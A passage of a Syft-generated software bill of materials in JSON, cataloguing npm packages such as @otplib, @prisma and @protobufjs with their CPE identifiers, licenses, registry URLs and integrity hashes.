1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/plugin_thirty_two:\\@otplib\\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/plugin_thirty_two:\\@otplib\\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/plugin-thirty:\\@otplib\\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/plugin-thirty:\\@otplib\\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/plugin_thirty:\\@otplib\\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/plugin_thirty:\\@otplib\\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/plugin:\\@otplib\\/plugin-thirty-two:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/plugin:\\@otplib\\/plugin_thirty_two:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40otplib/plugin-thirty-two@12.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@otplib/plugin-thirty-two/-/plugin-thirty-two-12.0.1.tgz","integrity":"sha512-MtT+uqRso909UkbrrYpJ6XFjj9D+x2Py7KjTO9JDPhL0bJUYVu5kFP4TFZW4NFAywrAtFRxOVY261u0qwb93gA==","dependencies":{"@otplib/core":"^12.0.1","thirty-two":"^1.0.2"}}},{"id":"05997a7e636d9fd8","name":"@otplib/preset-default","version":"12.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@otplib\\/preset-default:\\@otplib\\/preset-default:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/preset-default:\\@otplib\\/preset_default:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/preset_default:\\@otplib\\/preset-default:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/preset_default:\\@otplib\\/preset_default:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/preset:\\@otplib\\/preset-default:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/preset:\\@otplib\\/preset_default:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40otplib/preset-default@12.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@otplib/preset-default/-/preset-default-12.0.1.tgz","integrity":"sha512-xf1v9oOJRyXfluBhMdpOkr+bsE+Irt+0D5uHtvg6x1eosfmHCsCC6ej/m7FXiWqdo0+ZUI6xSKDhJwc8yfiOPQ==","dependencies":{"@otplib/core":"^12.0.1","@otplib/plugin-crypto":"^12.0.1","@otplib/plugin-thirty-two":"^12.0.1"}}},{"id":"59bf565b491e939f","name":"@otplib/preset-v11","version":"12.0.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@otplib\\/preset-v11:\\@otplib\\/preset-v11:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/preset-v11:\\@otplib\\/preset_v11:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/preset_v11:\\@otplib\\/preset-v11:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/preset_v11:\\@otplib\\/preset_v11:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/preset:\\@otplib\\/preset-v11:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@otplib\\/preset:\\@otplib\\/preset_v11:12.0.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40otplib/preset-v11@12.0.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@otplib/preset-v11/-/preset-v11-12.0.1.tgz","integrity":"sha512-9hSetMI7ECqbFiKICrNa4w70deTUfArtwXykPUvSHWOdzOlfa9ajglu7mNCntlvxycTiOAXkQGwjQCzzDEMRMg==","dependencies":{"@otplib/core":"^12.0.1","@otplib/plugin-crypto":"^12.0.1","@otplib/plugin-thirty-two":"^12.0.1"}}},{"id":"060c7b7a8f614664","name":"@pkgjs/parseargs","version":"0.11.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@pkgjs\\/parseargs:\\@pkgjs\\/parseargs:0.11.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40pkgjs/parseargs@0.11.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz","integrity":"sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==","dependencies":null}},{"id":"c440900ad881e975","name":"@prisma/client","version":"5.22.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@prisma\\/client:\\@prisma\\/client:5.22.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40prisma/client@5.22.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@prisma/client/-/client-5.22.0.tgz","integrity":"sha512-M0SVXfyHnQREBKxCgyo7sffrKttwE6R8PMq330MIUF0pTwjUhLbW84pFDlf06B27XyCR++VtjugEnIHdr07SVA==","dependencies":null}},{"id":"9f4e1fa5bdb80e5a","name":"@prisma/debug","version":"5.22.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@prisma\\/debug:\\@prisma\\/debug:5.22.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40prisma/debug@5.22.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@prisma/debug/-/debug-5.22.0.tgz","integrity":"sha512-AUt44v3YJeggO2ZU5BkXI7M4hu9BF2zzH2iF2V5pyXT/lRTyWiElZ7It+bRH1EshoMRxHgpYg4VB6rCM+mG5jQ==","dependencies":null}},{"id":"0f98eed7c2a9484e","name":"@prisma/engines","version":"5.22.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@prisma\\/engines:\\@prisma\\/engines:5.22.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40prisma/engines@5.22.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@prisma/engines/-/engines-5.22.0.tgz","integrity":"sha512-UNjfslWhAt06kVL3CjkuYpHAWSO6L4kDCVPegV6itt7nD1kSJavd3vhgAEhjglLJJKEdJ7oIqDJ+yHk6qO8gPA==","dependencies":{"@prisma/debug":"5.22.0","@prisma/engines-version":"5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2","@prisma/fetch-engine":"5.22.0","@prisma/get-platform":"5.22.0"}}},{"id":"3a15a4d5b57a6a32","name":"@prisma/engines-version","version":"5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@prisma\\/engines-version:\\@prisma\\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@prisma\\/engines-version:\\@prisma\\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@prisma\\/engines_version:\\@prisma\\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@prisma\\/engines_version:\\@prisma\\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@prisma\\/engines:\\@prisma\\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@prisma\\/engines:\\@prisma\\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@prisma/engines-version/-/engines-version-5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2.tgz","integrity":"sha512-2PTmxFR2yHW/eB3uqWtcgRcgAbG1rwG9ZriSvQw+nnb7c4uCr3RAcGMb6/zfE88SKlC1Nj2ziUvc96Z379mHgQ==","dependencies":null}},{"id":"373747b9463a5333","name":"@prisma/fetch-engine","version":"5.22.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@prisma\\/fetch-engine:\\@prisma\\/fetch-engine:5.22.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@prisma\\/fetch-engine:\\@prisma\\/fetch_engine:5.22.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@prisma\\/fetch_engine:\\@prisma\\/fetch-engine:5.22.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@prisma\\/fetch_engine:\\@prisma\\/fetch_engine:5.22.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@prisma\\/fetch:\\@prisma\\/fetch-engine:5.22.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@prisma\\/fetch:\\@prisma\\/fetch_engine:5.22.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40prisma/fetch-engine@5.22.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@prisma/fetch-engine/-/fetch-engine-5.22.0.tgz","integrity":"sha512-bkrD/Mc2fSvkQBV5EpoFcZ87AvOgDxbG99488a5cexp5Ccny+UM6MAe/UFkUC0wLYD9+9befNOqGiIJhhq+HbA==","dependencies":{"@prisma/debug":"5.22.0","@prisma/engines-version":"5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2","@prisma/get-platform":"5.22.0"}}},{"id":"35191eb100a1fadc","name":"@prisma/get-platform","version":"5.22.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"Apache-2.0","spdxExpression":"Apache-2.0","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@prisma\\/get-platform:\\@prisma\\/get-platform:5.22.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@prisma\\/get-platform:\\@prisma\\/get_platform:5.22.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@prisma\\/get_platform:\\@prisma\\/get-platform:5.22.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@prisma\\/get_platform:\\@prisma\\/get_platform:5.22.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@prisma\\/get:\\@prisma\\/get-platform:5.22.0:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@prisma\\/get:\\@prisma\\/get_platform:5.22.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40prisma/get-platform@5.22.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@prisma/get-platform/-/get-platform-5.22.0.tgz","integrity":"sha512-pHhpQdr1UPFpt+zFfnPazhulaZYCUqeIcPpJViYoq9R+D/yw4fjE+CtnsnKzPYm0ddUbeXUzjGVGIRVgPDCk4Q==","dependencies":{"@prisma/debug":"5.22.0"}}},{"id":"503ecf3ae2d5a446","name":"@protobufjs/aspromise","version":"1.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@protobufjs\\/aspromise:\\@protobufjs\\/aspromise:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40protobufjs/aspromise@1.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@protobufjs/aspromise/-/aspromise-1.1.2.tgz","integrity":"sha512-j+gKExEuLmKwvz3OgROXtrJ2UG2x8Ch2YZUxahh+s1F2HZ+wAceUNLkvy6zKCPVRkU++ZWQrdxsUeQXmcg4uoQ==","dependencies":null}},{"id":"493d13966d12b3a0","name":"@protobufjs/base64","version":"1.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@protobufjs\\/base64:\\@protobufjs\\/base64:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40protobufjs/base64@1.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@protobufjs/base64/-/base64-1.1.2.tgz","integrity":"sha512-AZkcAA5vnN/v4PDqKyMR5lx7hZttPDgClv83E//FMNhR2TMcLUhfRUBHCmSl0oi9zMgDDqRUJkSxO3wm85+XLg==","dependencies":null}},{"id":"12a6d95fe5a62fc1","name":"@protobufjs/codegen","version":"2.0.5","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@protobufjs\\/codegen:\\@protobufjs\\/codegen:2.0.5:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40protobufjs/codegen@2.0.5","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@protobufjs/codegen/-/codegen-2.0.5.tgz","integrity":"sha512-zgXFLzW3Ap33e6d0Wlj4MGIm6Ce8O89n/apUaGNB/jx+hw+ruWEp7EwGUshdLKVRCxZW12fp9r40E1mQrf/34g==","dependencies":null}},{"id":"7097fcb2aeb00411","name":"@protobufjs/eventemitter","version":"1.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@protobufjs\\/eventemitter:\\@protobufjs\\/eventemitter:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40protobufjs/eventemitter@1.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@protobufjs/eventemitter/-/eventemitter-1.1.0.tgz","integrity":"sha512-j9ednRT81vYJ9OfVuXG6ERSTdEL1xVsNgqpkxMsbIabzSo3goCjDIveeGv5d03om39ML71RdmrGNjG5SReBP/Q==","dependencies":null}},{"id":"4ed2c80c8ad8c116","name":"@protobufjs/fetch","version":"1.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@protobufjs\\/fetch:\\@protobufjs\\/fetch:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40protobufjs/fetch@1.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@protobufjs/fetch/-/fetch-1.1.0.tgz","integrity":"sha512-lljVXpqXebpsijW71PZaCYeIcE5on1w5DlQy5WH6GLbFryLUrBD4932W/E2BSpfRJWseIL4v/KPgBFxDOIdKpQ==","dependencies":{"@protobufjs/aspromise":"^1.1.1","@protobufjs/inquire":"^1.1.0"}}},{"id":"dda6f1aef9d11e58","name":"@protobufjs/float","version":"1.0.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@protobufjs\\/float:\\@protobufjs\\/float:1.0.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40protobufjs/float@1.0.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@protobufjs/float/-/float-1.0.2.tgz","integrity":"sha512-Ddb+kVXlXst9d+R9PfTIxh1EdNkgoRe5tOX6t01f1lYWOvJnSPDBlG241QLzcyPdoNTsblLUdujGSE4RzrTZGQ==","dependencies":null}},{"id":"a8f805afd5f928e8","name":"@protobufjs/inquire","version":"1.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@protobufjs\\/inquire:\\@protobufjs\\/inquire:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40protobufjs/inquire@1.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@protobufjs/inquire/-/inquire-1.1.1.tgz","integrity":"sha512-mnzgDV26ueAvk7rsbt9L7bE0SuAoqyuys/sMMrmVcN5x9VsxpcG3rqAUSgDyLp0UZlmNfIbQ4fHfCtreVBk8Ew==","dependencies":null}},{"id":"742d5880151b22a5","name":"@protobufjs/path","version":"1.1.2","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@protobufjs\\/path:\\@protobufjs\\/path:1.1.2:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40protobufjs/path@1.1.2","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@protobufjs/path/-/path-1.1.2.tgz","integrity":"sha512-6JOcJ5Tm08dOHAbdR3GrvP+yUUfkjG5ePsHYczMFLq3ZmMkAD98cDgcT2iA1lJ9NVwFd4tH/iSSoe44YWkltEA==","dependencies":null}},{"id":"2f9166cf527d1f74","name":"@protobufjs/pool","version":"1.1.0","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@protobufjs\\/pool:\\@protobufjs\\/pool:1.1.0:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40protobufjs/pool@1.1.0","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@protobufjs/pool/-/pool-1.1.0.tgz","integrity":"sha512-0kELaGSIDBKvcgS4zkjz1PeddatrjYcmMWOlAuAPwAeccUrPHdUqo/J6LiymHHEiJT5NrF1UVwxY14f+fy4WQw==","dependencies":null}},{"id":"afb917b3027623df","name":"@protobufjs/utf8","version":"1.1.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"BSD-3-Clause","spdxExpression":"BSD-3-Clause","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@protobufjs\\/utf8:\\@protobufjs\\/utf8:1.1.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40protobufjs/utf8@1.1.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@protobufjs/utf8/-/utf8-1.1.1.tgz","integrity":"sha512-oOAWABowe8EAbMyWKM0tYDKi8Yaox52D+HWZhAIJqQXbqe0xI/GV7FhLWqlEKreMkfDjshR5FKgi3mnle0h6Eg==","dependencies":null}},{"id":"e1894e7a0de3acac","name":"@react-email/render","version":"0.0.16","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-email\\/render:\\@react-email\\/render:0.0.16:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-email\\/render:\\@react_email\\/render:0.0.16:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_email\\/render:\\@react-email\\/render:0.0.16:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_email\\/render:\\@react_email\\/render:0.0.16:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-email\\/render:0.0.16:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_email\\/render:0.0.16:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-email/render@0.0.16","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-email/render/-/render-0.0.16.tgz","integrity":"sha512-wDaMy27xAq1cJHtSFptp0DTKPuV2GYhloqia95ub/DH9Dea1aWYsbdM918MOc/b/HvVS3w1z8DWzfAk13bGStQ==","dependencies":{"html-to-text":"9.0.5","js-beautify":"^1.14.11","react-promise-suspense":"0.3.4"}}},{"id":"38462ff4454997a0","name":"@react-pdf/fns","version":"2.2.1","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-pdf\\/fns:\\@react-pdf\\/fns:2.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/fns:\\@react_pdf\\/fns:2.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/fns:\\@react-pdf\\/fns:2.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react_pdf\\/fns:\\@react_pdf\\/fns:2.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react-pdf\\/fns:2.2.1:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react:\\@react_pdf\\/fns:2.2.1:*:*:*:*:*:*:*","source":"syft-generated"}],"purl":"pkg:npm/%40react-pdf/fns@2.2.1","metadataType":"javascript-npm-package-lock-entry","metadata":{"resolved":"https://registry.npmjs.org/@react-pdf/fns/-/fns-2.2.1.tgz","integrity":"sha512-s78aDg0vDYaijU5lLOCsUD+qinQbfOvcNeaoX9AiE7+kZzzCo6B/nX+l48cmt9OosJmvZvE9DWR9cLhrhOi2pA==","dependencies":{"@babel/runtime":"^7.20.13"}}},{"id":"4656650b2a6dd236","name":"@react-pdf/fns","version":"3.1.3","type":"npm","foundBy":"javascript-lock-cataloger","locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}],"licenses":[{"value":"MIT","spdxExpression":"MIT","type":"declared","urls":[],"locations":[{"path":"/package-lock.json","accessPath":"/package-lock.json","annotations":{"evidence":"primary"}}]}],"language":"javascript","cpes":[{"cpe":"cpe:2.3:a:\\@react-pdf\\/fns:\\@react-pdf\\/fns:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2.3:a:\\@react-pdf\\/fns:\\@react_pdf\\/fns:3.1.3:*:*:*:*:*:*:*","source":"syft-generated"},{"cpe":"cpe:2